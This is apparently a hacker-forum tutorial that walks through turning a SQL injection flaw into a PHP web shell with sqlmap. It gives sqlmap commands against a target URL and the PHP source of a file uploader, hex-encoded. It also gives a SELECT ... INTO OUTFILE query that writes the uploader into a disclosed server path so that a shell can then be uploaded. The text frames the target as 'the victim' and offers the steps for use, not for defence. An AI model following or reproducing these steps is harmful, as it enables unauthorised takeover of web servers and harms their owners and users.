Sqli to shell with sqlmap

Today I will explain how to create a php shell using a sql injection bug with sqlmap tool.

Requirements:
sqlmap
Sql Bug with Stacked Queries
Current-User: Root / SA / None


1- (Linux User) ./sqlmap.py -u TARGET.com/bug.php?id=1 --current-user

(Windows user) sqlmap.py -u TARGET.com/bug.php?id=1 --current-user 



Current-user = NONE / ROOT


2- Now we need an FPD (Full Path Disclosure)
In my case this is the FPD:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /espejo/htdocs.v2/portalnuevo/buscadores/portal_contenidos.php on line 79

3- Now we need an uploader in my case is an uploader php (this server work with PHP lang)

Code:

<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>

--------------------------------------------------------------------------------------------

Ok we go to Convert String To Hexadecimal Online and let's encode the uploader to Hex

This is the uploader encode in Hex

Code:

3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e

4- (Linux User) ./sqlmap.py -u TARGET.com/bug.php?id=1 --sql-shell

(Windows user) sqlmap.py -u TARGET.com/bug.php?id=1 --sql-shell 

and we recive something like this:



Ok we got control of Sql server of the victim, the next command is 

SELECT + 0x + HEX Code+ INTO OUTFILE + Full Path + Uploader name

in my case is :

Code:

select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e 
into "/espejo/htdocs.v2/portalnuevo/buscadores/upload.php";

If sqlmap shows them the code of the uploader in green (Like in my pic) means that everything went well




Now we go to the selected path and we got the uploader into the server. Now we can upload a PHP Shell and do everything you do with any other php shell

Sorry for my english im Argentinian

Regards for all Pakbugs users (: